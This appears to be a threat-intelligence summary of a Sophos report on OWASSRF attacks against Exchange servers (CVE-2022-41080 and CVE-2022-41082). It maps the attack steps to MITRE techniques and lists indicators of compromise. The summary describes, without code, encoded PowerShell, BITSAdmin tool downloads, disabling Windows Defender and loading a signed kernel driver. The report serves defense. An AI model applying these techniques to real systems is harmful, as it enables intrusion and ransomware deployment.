Sophos X-Ops observed continued exploitation of Microsoft Exchange servers using the OWASSRF chain that leverages CVE-2022-41080 and CVE-2022-41082 to achieve ProxyShell/ProxyNotShell-style access. The campaigns targeted high-profile entities such as Rackspace, with attempts to deploy ransomware that were ultimately blocked by patches and defender actions, highlighted by CISA guidance urging quick remediation.
Keypoints
- OWASSRF exploitation continued against Exchange servers using the same two CVEs after initial patches were released.
- The attack flow combines SSRF-like steps with remote code execution to reach post-exploitation activity.
- Post-exploitation activities included encoded PowerShell commands, DNS-based recon, and use of LOLBins (PowerShell, PsExec, RDP).
- Threat actors attempted to deploy ransomware and disable security tooling, including Windows Defender, and to load a kernel driver signed by a known vendor.
- Indicators of compromise included several C2 IPs, a PoC script (poc.py), and dual-use tools downloaded via BITSAdmin.
- CISA urged federal agencies to apply patches and highlighted ongoing risk as unpatched Exchange servers remain exposed.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The OWASSRF technique chains CVE-2022-41080 and CVE-2022-41082 to compromise Exchange via OWA. Quote: “The OWASSRF technique once again chains two CVEs… to achieve a ProxyShell / ProxyNotShell-style attack via OWA.”
- [T1059.001] PowerShell – Encoded PowerShell commands spawned from w3wp during post-exploitation. Quote: “encoded PowerShell commands spawning from w3wp.”
- [T1016] System Network Configuration Discovery – DNS-based reconnaissance using nslookup with a DNS logging service. Quote: “Used the native Windows binary ‘nslookup’ with a DNS logging service for reconnaissance.”
- [T1105] Ingress Tool Transfer – BITSAdmin used to download dual-use tools (ScreenConnect, AnyDesk) from external sites. Quote: “Leveraged BITSAdmin to download multiple dual-use agents… from 4sync[.]com, anonfiles[.]com.”
- [T1021.004] Remote Services (SSH) – Remote connection established via a renamed PuTTY executable. Quote: “a renamed copy of PuTTy Link, which was used to establish a remote connection.”
- [T1562.004] Impair Defenses – Modifying Windows Firewall to enable remote desktop access. Quote: “Set a rule in the Windows Advanced Firewall to allow traffic for remote desktop.”
- [T1218] Signed Binary Proxy Execution – Use of a kernel driver loaded via Windows Service Control Manager, including a signed driver certificate. Quote: “This driver file uses a code-signing certificate…”; “The Windows Service Control Manager program was executed to load this driver.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – Attempts to disable antimalware/logging tools (Windows Defender) via PowerShell. Quote: “attempting to disable antimalware and logging tools… Windows Defender features.”
- [T1543.003] Create or Modify System Process: Windows Service – Creation of a service to load a kernel driver (dRVag.sys). Quote: “Windows Service Control Manager… to load this driver.”
Indicators of Compromise
- [IP] C2 addresses – 179.60.149.28, 141.98.9.4, and 5 more items
- [Domain] DNS/logging domains used in recon – dnslog.cn, and 1 more domain
- [File] PoC and tooling – poc.py, and 1 more file (e.g., sophos_k.exe)
- [File] Kernel driver/file names – dRVag.sys, komar65.dll
- [File] Dual-use assets downloaded via BITSAdmin – ga.exe, baidu (executable name fragments)
- [URL] Remote-access/tooling hosts – 4sync.com, anonfiles.com
Read more: https://news.sophos.com/en-us/2023/03/15/observing-owassrf-exchange-exploitation-still/